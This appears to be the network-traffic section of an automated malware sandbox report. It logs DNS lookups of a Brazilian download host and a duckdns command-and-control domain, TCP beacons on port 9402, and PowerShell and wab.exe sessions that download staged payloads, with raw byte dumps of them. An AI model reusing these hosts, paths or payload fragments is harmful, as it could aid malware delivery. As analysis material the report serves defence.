                                          May 22, 2024 20:08:03.870304108 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:03.875329018 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:16.058099031 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:16.139739990 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:18.121436119 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:18.166779041 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:28.245376110 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:28.250399113 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:40.422736883 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:40.427794933 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:41.057817936 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:41.062758923 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:41.589042902 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:41.594070911 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:42.026606083 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:42.033498049 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:48.122164965 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:48.167031050 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:52.433152914 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:52.444601059 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:52.464847088 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:52.498655081 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:52.714745045 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:52.719878912 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:52.760524988 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:52.765686035 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:54.319665909 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:54.342200994 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:54.342250109 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:54.350653887 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:54.350709915 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:54.355602980 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:54.360141993 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:54.368675947 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:54.410285950 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:54.439142942 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:55.990993977 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:56.007473946 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:56.270195007 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:56.298660994 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:56.545732975 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:56.562984943 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:58.378485918 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:58.383665085 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:08:59.964231014 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:08:59.969335079 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:09:00.242091894 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:09:00.247042894 CEST94024970812.221.146.138192.168.2.7
                                          May 22, 2024 20:09:04.669147968 CEST497089402192.168.2.712.221.146.138
                                          May 22, 2024 20:09:04.674340010 CEST94024970812.221.146.138192.168.2.7

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 22, 2024 20:07:00.101027012 CEST5226253192.168.2.71.1.1.1
                                          May 22, 2024 20:07:00.524188042 CEST53522621.1.1.1192.168.2.7
                                          May 22, 2024 20:07:38.356645107 CEST5657653192.168.2.71.1.1.1
                                          May 22, 2024 20:07:39.258768082 CEST53565761.1.1.1192.168.2.7

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          May 22, 2024 20:07:00.101027012 CEST192.168.2.71.1.1.10xb860Standard query (0)ranchoboscardin.com.brA (IP address)IN (0x0001)false
                                          May 22, 2024 20:07:38.356645107 CEST192.168.2.71.1.1.10xbd40Standard query (0)xw9402may.duckdns.orgA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          May 22, 2024 20:07:00.524188042 CEST1.1.1.1192.168.2.70xb860No error (0)ranchoboscardin.com.br67.23.238.5A (IP address)IN (0x0001)false
                                          May 22, 2024 20:07:39.258768082 CEST1.1.1.1192.168.2.70xbd40No error (0)xw9402may.duckdns.org12.221.146.138A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • ranchoboscardin.com.br

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.74970067.23.238.54434788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-22 18:07:01 UTC184OUTGET /cs/Rrknoglerne.asd HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: ranchoboscardin.com.br
                                          Connection: Keep-Alive
                                          2024-05-22 18:07:01 UTC315INHTTP/1.1 200 OK
                                          Date: Wed, 22 May 2024 18:07:01 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Thu, 16 May 2024 11:30:08 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 482116
                                          Cache-Control: max-age=2592000
                                          Expires: Fri, 21 Jun 2024 18:07:01 GMT
                                          Vary: Accept-Encoding,User-Agent
                                          2024-05-22 18:07:01 UTC7877INData Raw: 63 51 47 62 36 77 4c 37 31 4c 74 6c 44 77 77 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 4f 73 43 78 7a 35 78 41 5a 75 35 66 38 78 65 57 75 73 43 2b 45 58 72 41 6a 4d 79 67 65 6d 6f 44 6f 4a 43 36 77 4b 36 4b 48 45 42 6d 34 48 78 31 37 33 63 46 2b 73 43 39 70 56 78 41 5a 76 72 41 6f 79 6a 36 77 49 69 56 37 6f 31 68 54 4b 6a 36 77 4a 52 79 65 73 43 4e 7a 74 78 41 5a 76 72 41 71 75 6c 4d 63 72 72 41 6a 70 4e 63 51 47 62 69 52 51 4c 36 77 49 6e 58 58 45 42 6d 39 48 69 36 77 49 31 35 33 45 42 6d 34 50 42 42 4f 73 43 4f 45 37 72 41 6d 6b 70 67 66 6c 62 59 30 41 44 66 4d 72 72 41 6a 49 68 36 77 4a 69 50 6f 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 33 45 42 6d 34 48 44 76 4c 68 71 41 65 73 43 49 44 58 72 41 6a 71 30 75 67 74 77 35 54 56 78 41 5a 76
                                          Data Ascii: cQGb6wL71LtlDwwAcQGbcQGbA1wkBOsCxz5xAZu5f8xeWusC+EXrAjMygemoDoJC6wK6KHEBm4Hx173cF+sC9pVxAZvrAoyj6wIiV7o1hTKj6wJRyesCNztxAZvrAqulMcrrAjpNcQGbiRQL6wInXXEBm9Hi6wI153EBm4PBBOsCOE7rAmkpgflbY0ADfMrrAjIh6wJiPotEJARxAZtxAZuJw3EBm3EBm4HDvLhqAesCIDXrAjq0ugtw5TVxAZv
                                          2024-05-22 18:07:01 UTC8000INData Raw: 57 35 56 63 74 4b 54 4a 78 76 44 4f 56 69 6c 57 63 2f 43 33 56 67 47 6f 2f 44 54 49 4c 38 7a 2f 42 77 51 4b 55 38 39 6b 59 64 6f 6e 58 37 30 75 4c 67 50 45 55 57 31 33 38 2b 76 78 6f 64 46 69 59 5a 71 33 35 74 36 6d 43 59 4b 41 33 70 46 72 76 63 6b 39 49 72 46 4f 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 58 4c 4b 54 74 6a 30 6a 75 54 6c 52 50 34 30 46 56 48 6d 37 6e 4b 66 44 34 61 66 62 76 33 56 56 41 2f 42 7a 4c 7a 5a 6a 6f 39 62 63 36 48 30 42 32 70 76 58 47 6f 6f 47 77 33 35 4d 63 6c 72 7a 61 6a 6a 38 4e 38 38 31 67 59 63 72 6b 33 42 50 58 4a 67 49 41 32 78 69 53 5a 4d 72 38 45 4c 32 52 74 66 74 38 36 4b 69 6b 7a 77 55 61 43 6d 37 33 6b 6b 55 35 68 31 41 59 6e 78 7a 58 74 6f 79
                                          Data Ascii: W5VctKTJxvDOVilWc/C3VgGo/DTIL8z/BwQKU89kYdonX70uLgPEUW138+vxodFiYZq35t6mCYKA3pFrvck9IrFOvuLB177iwde+4sHXvuLB177iwde+4sHXvuLB177XLKTtj0juTlRP40FVHm7nKfD4afbv3VVA/BzLzZjo9bc6H0B2pvXGooGw35Mclrzajj8N881gYcrk3BPXJgIA2xiSZMr8EL2Rtft86KikzwUaCm73kkU5h1AYnxzXtoy
                                          2024-05-22 18:07:01 UTC8000INData Raw: 37 77 54 39 39 56 55 35 61 57 5a 6a 77 52 36 59 4e 54 6e 4c 63 2b 47 74 61 74 4b 4d 72 6c 36 65 49 65 7a 76 4d 71 47 72 55 44 77 4f 7a 47 71 46 34 36 2f 38 70 4b 61 5a 7a 48 79 43 56 54 4a 49 63 7a 6c 76 45 59 4a 6c 71 55 65 72 68 51 50 47 58 6a 45 55 33 2b 41 75 62 4b 78 57 63 34 6f 4f 51 5a 62 77 32 62 42 56 41 53 79 33 77 65 64 49 68 58 56 6f 41 6f 7a 65 6c 48 32 55 54 57 64 68 4d 42 74 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 74 48 70 6d 30 5a 4c 44 65 38 54 34 70 77 62 4a 72 4b 2b 4d 74 6a 69 77 64 65 72 44 54 6d 37 42 39 78 68 71 6b 65 64 55 54 75 65 6d 53 6b 45 53 47 53 68 71 6d 33 68 35 36 30 65 6d 51 34 77 61 35 52 6a 6b 46 73 62 7a 70 76 59 7a 42 37 6b 6c 33 54 57 65 67 65
                                          Data Ascii: 7wT99VU5aWZjwR6YNTnLc+GtatKMrl6eIezvMqGrUDwOzGqF46/8pKaZzHyCVTJIczlvEYJlqUerhQPGXjEU3+AubKxWc4oOQZbw2bBVASy3wedIhXVoAozelH2UTWdhMBt+4sHXvuLB177iwde+4sHXvuLB177iwde+4sHXvtHpm0ZLDe8T4pwbJrK+MtjiwderDTm7B9xhqkedUTuemSkESGShqm3h560emQ4wa5RjkFsbzpvYzB7kl3TWege
                                          2024-05-22 18:07:01 UTC8000INData Raw: 35 38 64 6f 48 53 79 70 76 75 4c 42 37 59 65 4d 67 4e 65 63 6a 59 7a 58 50 75 4c 39 46 45 38 75 41 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 6a 2f 55 73 59 55 4f 78 5a 76 57 65 6a 5a 30 47 51 36 56 52 39 63 42 4f 41 76 42 52 2b 35 67 5a 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 34 76 67 65 42 59 39 75 76 58 54 55 61 6a 2b 31 75 72 42 45 2f 4b 4b 59 4e 78 42 39 66 63 79 2f 6d 73 70 6c 4c 7a 78 71 53 72 55 43 51 76 78 33 2f 50 75 45 33 4e 45 34 68 33 4d 46 55 74 68 54 72 41 4b 7a 4d 6c 4a 4b 45 4f 6d 4d 36 35 6a 4f 50 50 69 51 64 65 4e 39 75 6d 63 46 53 6e 57 42 6a 4e 73 66 41 51 33 4f 42 6d 4f 39 33 36 43 69 75 49
                                          Data Ascii: 58doHSypvuLB7YeMgNecjYzXPuL9FE8uAde+4sHXvuLB177iwde+4sHXvuLB177iwde+4sHj/UsYUOxZvWejZ0GQ6VR9cBOAvBR+5gZXvuLB177iwde+4sHXvuLB177iwde+4sHXvuLB14vgeBY9uvXTUaj+1urBE/KKYNxB9fcy/msplLzxqSrUCQvx3/PuE3NE4h3MFUthTrAKzMlJKEOmM65jOPPiQdeN9umcFSnWBjNsfAQ3OBmO936CiuI
                                          2024-05-22 18:07:01 UTC8000INData Raw: 35 34 61 7a 43 52 34 4a 2f 41 32 67 6f 65 6c 37 59 4b 57 6f 51 6f 7a 65 75 4d 41 61 5a 4c 30 6a 57 79 46 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 74 41 56 47 51 53 41 58 69 76 2b 39 32 35 42 39 6f 62 55 74 38 4e 56 68 49 66 70 77 72 70 65 78 56 72 45 39 38 56 51 45 41 32 50 41 72 78 6e 2b 73 4d 4b 74 66 46 6c 59 6a 33 38 46 68 6b 4a 33 30 53 6f 44 41 34 76 35 2f 38 68 68 51 72 41 44 4d 34 78 55 4f 41 33 4e 32 2f 64 71 44 58 52 7a 46 38 41 4c 2b 6e 74 62 51 41 39 49 72 78 62 2f 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 57 68 44 36 6e 52 6d 4c 48 31 37 33 70 33 75 64 76 44 46 2f 52 77 49 64 74 71 4c 78 41 31 35 30
                                          Data Ascii: 54azCR4J/A2goel7YKWoQozeuMAaZL0jWyF+4sHXvuLB177iwde+4sHXvuLB177iwde+4sHXvtAVGQSAXiv+925B9obUt8NVhIfpwrpexVrE98VQEA2PArxn+sMKtfFlYj38FhkJ30SoDA4v5/8hhQrADM4xUOA3N2/dqDXRzF8AL+ntbQA9Irxb/uLB177iwde+4sHXvuLB177iwde+4sHXvuLB177WhD6nRmLH173p3udvDF/RwIdtqLxA150
                                          2024-05-22 18:07:01 UTC8000INData Raw: 36 41 72 4a 67 72 77 55 34 66 79 31 74 38 4d 62 54 6c 53 39 77 49 34 41 54 74 38 6c 49 76 35 51 53 6f 45 44 69 61 6e 2f 55 58 57 55 6e 75 6f 71 61 6a 65 48 64 6c 67 41 57 50 79 73 64 42 48 38 4d 32 56 2b 4d 49 59 78 62 72 55 55 64 56 4f 65 77 5a 65 2b 39 32 35 68 62 61 6e 42 4e 38 4e 45 64 48 7a 46 51 72 70 53 65 6c 39 47 64 38 4e 36 4b 2f 56 4e 51 49 35 72 79 6b 4f 57 34 46 68 55 35 31 57 6a 69 56 35 5a 59 42 73 7a 46 45 4d 72 35 44 6d 48 69 35 6e 32 58 32 6d 2b 42 78 53 4b 73 67 68 6a 31 39 42 63 65 38 39 79 4b 47 6a 70 6c 6b 4e 51 44 54 55 44 6c 4d 4b 37 43 71 30 70 72 62 66 43 45 2f 36 4b 6b 77 4b 37 4e 47 44 33 45 63 4a 5a 77 4c 67 56 2b 51 57 67 35 79 4f 6d 53 41 63 34 31 63 77 42 6a 44 41 32 4f 55 31 58 72 77 38 58 4f 71 59 76 2b 73 57 58 73 45 45
                                          Data Ascii: 6ArJgrwU4fy1t8MbTlS9wI4ATt8lIv5QSoEDian/UXWUnuoqajeHdlgAWPysdBH8M2V+MIYxbrUUdVOewZe+925hbanBN8NEdHzFQrpSel9Gd8N6K/VNQI5rykOW4FhU51WjiV5ZYBszFEMr5DmHi5n2X2m+BxSKsghj19Bce89yKGjplkNQDTUDlMK7Cq0prbfCE/6KkwK7NGD3EcJZwLgV+QWg5yOmSAc41cwBjDA2OU1Xrw8XOqYv+sWXsEE
                                          2024-05-22 18:07:01 UTC8000INData Raw: 34 5a 71 33 32 56 69 72 2b 33 5a 76 57 71 31 6d 6c 72 66 43 63 70 6b 32 34 51 4b 37 53 76 58 48 79 55 4a 5a 77 4c 67 58 2b 77 57 67 34 61 49 6f 58 66 74 56 6b 67 55 45 72 46 75 6d 52 63 72 50 4b 55 79 30 36 44 6c 4a 46 70 4b 70 37 43 46 78 61 75 4d 37 48 41 30 75 52 64 59 41 79 79 76 32 32 79 39 69 77 78 6e 4c 48 53 68 66 63 48 50 66 63 44 44 70 48 4e 64 6b 75 46 39 79 44 47 7a 66 57 48 6b 56 46 2f 33 48 6c 2b 61 4f 50 75 58 32 6d 38 72 69 68 56 37 54 4b 46 75 49 79 37 2f 74 4d 51 67 4b 45 50 78 67 4f 48 2f 65 5a 63 4c 78 35 71 50 43 37 4c 7a 34 48 71 2f 49 35 58 34 69 33 42 52 79 62 44 53 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 34 32 39 72 30 4d 46 2b 48 61 30 6d 35 48 51 43 57 76
                                          Data Ascii: 4Zq32Vir+3ZvWq1mlrfCcpk24QK7SvXHyUJZwLgX+wWg4aIoXftVkgUErFumRcrPKUy06DlJFpKp7CFxauM7HA0uRdYAyyv22y9iwxnLHShfcHPfcDDpHNdkuF9yDGzfWHkVF/3Hl+aOPuX2m8rihV7TKFuIy7/tMQgKEPxgOH/eZcLx5qPC7Lz4Hq/I5X4i3BRybDSXvuLB177iwde+4sHXvuLB177iwde+4sHXvuLB1429r0MF+Ha0m5HQCWv
                                          2024-05-22 18:07:01 UTC8000INData Raw: 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 52 71 63 4f 2f 4f 4f 72 67 74 74 46 37 4b 38 61 43 2f 6a 66 54 71 59 46 58 76 76 66 78 6c 68 76 32 4c 78 56 75 32 6c 39 33 77 6a 79 71 74 6d 34 43 73 51 42 49 78 50 31 33 77 68 32 70 70 43 55 43 75 79 74 70 37 74 44 31 2f 6a 4c 78 31 49 35 68 31 43 61 6e 67 58 6b 6d 32 4d 50 64 6f 6a 51 43 63 73 6c 76 44 7a 68 56 72 30 36 6f 35 31 55 4c 69 48 7a 4d 32 30 50 49 79 49 45 78 41 50 50 30 44 7a 62 31 6f 6b 48 58 6f 2b 4f 37 78 6d 4d 69 77 66 64 68 76 38 47 55 58 34 2f 45 46 37 37 32 4c 7a 2b 34 68 41 6a 33 7a 6a 72 6c 59 4a 4f 43 73 53 5a 39 51 49 69 31 2b 41 56 48 34 79 7a 53 36 49 6c 33 49 41 61 55 34 36 50 4b 32 6f 61 4e 53 30 68 54 55 46 69 4b 52 6c 2b 35 36 6f 76
                                          Data Ascii: wde+4sHXvuLB177iwde+4sHXvuLB177RqcO/OOrgttF7K8aC/jfTqYFXvvfxlhv2LxVu2l93wjyqtm4CsQBIxP13wh2ppCUCuytp7tD1/jLx1I5h1CangXkm2MPdojQCcslvDzhVr06o51ULiHzM20PIyIExAPP0Dzb1okHXo+O7xmMiwfdhv8GUX4/EF772Lz+4hAj3zjrlYJOCsSZ9QIi1+AVH4yzS6Il3IAaU46PK2oaNS0hTUFiKRl+56ov
                                          2024-05-22 18:07:01 UTC8000INData Raw: 6f 4c 71 59 50 32 4d 66 4f 36 44 30 35 4c 41 30 50 6f 4e 63 42 59 6b 58 50 75 4c 43 46 38 4d 45 67 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 6b 71 32 7a 44 50 42 32 62 70 6e 77 35 45 37 65 57 41 51 2b 6c 31 37 37 69 38 76 77 46 77 4f 6b 6c 38 4a 66 49 41 4e 44 30 78 70 6b 37 37 61 7a 79 55 41 71 4e 48 58 6c 44 49 72 69 48 53 54 78 79 62 44 4b 65 5a 51 46 52 6b 64 6a 38 62 54 76 45 4c 2b 50 42 31 48 36 6e 56 4e 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 6a 36 6c 46 42 43 66 57 2b 2b 6d 72 34 73 48 4f 50 52 4d 4e 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37 69 77 64 65 2b 34 73 48 58 76 75 4c 42 31 37 37
                                          Data Ascii: oLqYP2MfO6D05LA0PoNcBYkXPuLCF8MEgde+4sHXvuLB177iwde+4sHXvuLB177iwde+4sHkq2zDPB2bpnw5E7eWAQ+l177i8vwFwOkl8JfIAND0xpk77azyUAqNHXlDIriHSTxybDKeZQFRkdj8bTvEL+PB1H6nVNe+4sHXvuLB177iwde+4sHXvuLB177iwde+4sHXj6lFBCfW++mr4sHOPRMN177iwde+4sHXvuLB177iwde+4sHXvuLB177
                                          2024-05-22 18:07:01 UTC8000INData Raw: 51 57 6f 50 6a 2b 47 36 36 71 4a 42 31 36 48 32 4d 6c 4b 65 6a 35 57 58 50 75 4c 39 76 77 44 2f 59 62 7a 71 6f 6b 48 58 70 5a 56 57 7a 36 34 64 49 6f 50 2b 59 73 48 4b 77 7a 49 59 64 38 45 4e 71 75 5a 2b 4c 4c 70 49 4c 53 79 33 64 2f 49 64 4b 6a 72 79 72 50 7a 33 38 68 75 68 34 41 66 43 6a 51 42 41 61 33 56 5a 79 4d 50 36 70 6c 2b 37 67 56 65 2b 39 70 30 53 37 64 39 77 64 68 36 50 6d 4a 63 2b 34 74 38 6a 57 68 36 68 76 4f 65 69 51 64 65 65 42 7a 43 58 5a 31 38 77 54 4d 57 43 71 6f 37 2b 59 73 48 2b 76 4e 4b 76 71 6b 36 44 6c 65 78 69 39 6d 39 71 4d 35 54 44 74 30 42 76 41 6a 53 52 71 63 44 58 71 45 4c 2b 63 2b 34 64 49 6f 37 2b 59 73 48 4b 77 2f 74 67 70 2b 34 73 2f 71 5a 2b 48 68 67 65 4c 31 38 78 73 75 59 47 57 6b 34 44 45 6d 42 43 6e 71 34 37 65 4b 35
                                          Data Ascii: QWoPj+G66qJB16H2MlKej5WXPuL9vwD/YbzqokHXpZVWz64dIoP+YsHKwzIYd8ENquZ+LLpILSy3d/IdKjryrPz38huh4AfCjQBAa3VZyMP6pl+7gVe+9p0S7d9wdh6PmJc+4t8jWh6hvOeiQdeeBzCXZ18wTMWCqo7+YsH+vNKvqk6Dlexi9m9qM5TDt0BvAjSRqcDXqEL+c+4dIo7+YsHKw/tgp+4s/qZ+HhgeL18xsuYGWk4DEmBCnq47eK5


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.74970767.23.238.54431912C:\Program Files (x86)\Windows Mail\wab.exe
                                          TimestampBytes transferredDirectionData
                                          2024-05-22 18:07:33 UTC185OUTGET /cs/yGxZBUGU144.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: ranchoboscardin.com.br
                                          Cache-Control: no-cache
                                          2024-05-22 18:07:33 UTC354INHTTP/1.1 200 OK
                                          Date: Wed, 22 May 2024 18:07:33 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Thu, 16 May 2024 11:27:56 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 34880
                                          Cache-Control: max-age=2592000
                                          Expires: Fri, 21 Jun 2024 18:07:33 GMT
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: application/octet-stream
                                          2024-05-22 18:07:33 UTC7838INData Raw: ff 2a 7e 6f f8 81 cb 34 c6 9d 3a 6f 20 1d 51 83 2a ec 33 bc 9d 2b 7c 9c a7 cd 8a 19 ef 99 7e 67 01 a6 42 73 1b 38 ba c1 d8 66 68 0a a1 3f 83 8b ce a2 26 83 a1 fc 47 7c 7a e2 1b 41 b4 bf 48 64 3f ff c6 9f 6a 0e d6 07 6f b8 82 5c 84 b1 58 cb 72 dd 95 13 9d 0a 83 10 bf 33 5d 47 99 e9 c8 da 79 41 21 2a 7a a8 9a 62 79 d7 b2 6f 25 9c 7d ca 35 39 bf a3 51 ad 57 26 f3 28 d5 b4 9b 9e 58 29 00 1b 16 6e 8b 68 41 fa 68 42 4e d4 f3 28 9d cd ce 7e 19 3e 96 d4 34 73 c5 5c 27 3d aa dd 69 7e d4 00 34 6b 63 59 bd 00 73 14 21 9b 98 82 fc 90 6e 5a 33 a5 2c e7 46 84 66 af 17 d8 8f 3a ca cc e3 5c b9 ae 63 be ca 08 5d 00 df 3f 71 2b 1a ad 7f 9e 0e b9 a7 45 b1 38 53 2c 8d b8 66 6d 3e 2d 96 0d 6e c5 03 82 db 4a 39 1c 59 34 52 90 e7 5f e2 66 50 ba 78 cf 1e 8d 20 45 67 6f e4 dd 91
                                          Data Ascii: *~o4:o Q*3+|~gBs8fh?&G|zAHd?jo\Xr3]GyA!*zbyo%}59QW&(X)nhAhBN(~>4s\'=i~4kcYs!nZ3,Ff:\c]?q+E8S,fm>-nJ9Y4R_fPx Ego
                                          2024-05-22 18:07:34 UTC8000INData Raw: d9 2b c6 2a 11 2c 48 26 27 8b 29 72 ab 37 fa 30 76 89 12 8e 73 2c 7b b2 85 d8 5b 89 27 8a 47 10 61 1e 8f ae da 15 22 0e 3e 01 fb dc 5f 83 a3 93 d7 1b 78 dc b6 9f ea 38 be 0a d6 5d fd c1 49 d9 09 de 98 fc d0 2b d7 f4 09 44 bc 4a d3 e8 ea af 9a 3a ac 81 45 c9 9c 2d 6f c6 f5 31 d9 55 34 c3 fe 22 97 67 7b ed 5e 3a 1a 0a bd f2 e9 e3 3d 7d 74 50 a8 38 29 16 29 89 01 4a 5f 0b 7e 6f 11 fd ce e2 13 31 86 51 f2 ee 0a 22 c7 b2 fb d3 40 15 39 a7 4d c3 6f 75 e9 57 f5 04 b1 66 4d b8 36 90 89 76 01 cd d7 04 96 de a3 53 2b 51 70 19 f2 fe 8e 95 26 cd 6e 84 aa a7 93 69 31 13 6d 55 00 33 f8 e8 24 ed a3 ac d4 25 20 04 b1 a8 d6 20 06 8e e8 63 09 e5 6b f6 2e 49 65 78 92 2b fa 47 b0 7c c2 67 5b a1 01 e6 5a 32 b4 1c da dc 09 5c e2 53 87 f5 f1 e2 86 2e 74 c2 4e b3 35 c1 25 ae b8
                                          Data Ascii: +*,H&')r70vs,{['Ga">_x8]I+DJ:E-o1U4"g{^:=}tP8))J_~o1Q"@9MouWfM6vS+Qp&ni1mU3$% ck.Iex+G|g[Z2\S.tN5%
                                          2024-05-22 18:07:34 UTC8000INData Raw: 0b 63 b1 ee 9d 08 6a 76 38 b4 4a 81 0e 47 78 08 53 b4 b3 34 16 5b 55 07 1e c2 0e 3b e1 00 37 05 d8 6f 25 00 c6 38 7b 8d 13 0f e7 fb da 15 5b 47 53 ae ef cb 4e c3 02 33 f9 e4 aa 9d d3 36 20 23 e6 76 4d eb 7a 74 bb 17 f6 14 7e 31 1d e9 5c 4e a0 69 73 3d 0a 28 06 d9 78 a0 9a 2c 5e 9d c3 11 1a 37 04 d9 a0 0d 85 bd 4e 1c 74 42 8e 1f 03 e9 15 c0 cf ae 23 f9 d8 c5 24 58 e6 22 bd f4 7c 28 79 39 2b c7 ca 21 99 f0 d8 6b d0 1f e4 4c fa 24 a7 29 36 0d 60 25 43 81 f7 7e 83 14 f9 30 3a a2 60 87 d3 25 c3 b2 87 f0 ea 89 24 80 75 7e 14 17 9d a4 bb 6b 9e 31 3e 05 88 f6 59 9b 9f ec e8 1b 1f d8 f0 16 85 8a be 0a da cf 71 62 5a d9 64 d8 8f 93 65 2b e5 fc 0f 64 ad 6d b8 ea 85 1a 9b 3a cd 85 37 7a 98 2d c7 aa 43 31 d8 5f d7 af 49 22 96 6d e3 80 5e 3a 1a 01 bb fb ee cf 3a 7a 36
                                          Data Ascii: cjv8JGxS4[U;7o%8{[GSN36 #vMzt~1\Nis=(x,^7NtB#$X"|(y9+!kL$)6`%C~0:`%$u~k1>YqbZde+dm:7z-C1_I"m^::z6
